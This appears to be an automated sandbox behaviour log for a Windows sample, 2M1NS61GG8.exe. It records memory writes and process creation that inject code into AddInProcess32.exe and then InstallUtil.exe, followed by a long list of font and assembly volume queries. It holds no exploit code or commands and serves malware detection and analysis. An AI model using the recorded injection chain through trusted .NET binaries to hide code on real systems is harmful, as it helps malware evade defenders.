Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7C0000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7C8000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 4C3008	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 4C0000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 4C8000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7AB008	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43C000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43F000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 44B000	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 8C8008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 462000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4BE000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B06008	Jump to behavior

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: InstallUtil.exe, 00000009.00000002.2485480778.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Users\user\Desktop\2M1NS61GG8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2M1NS61GG8.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
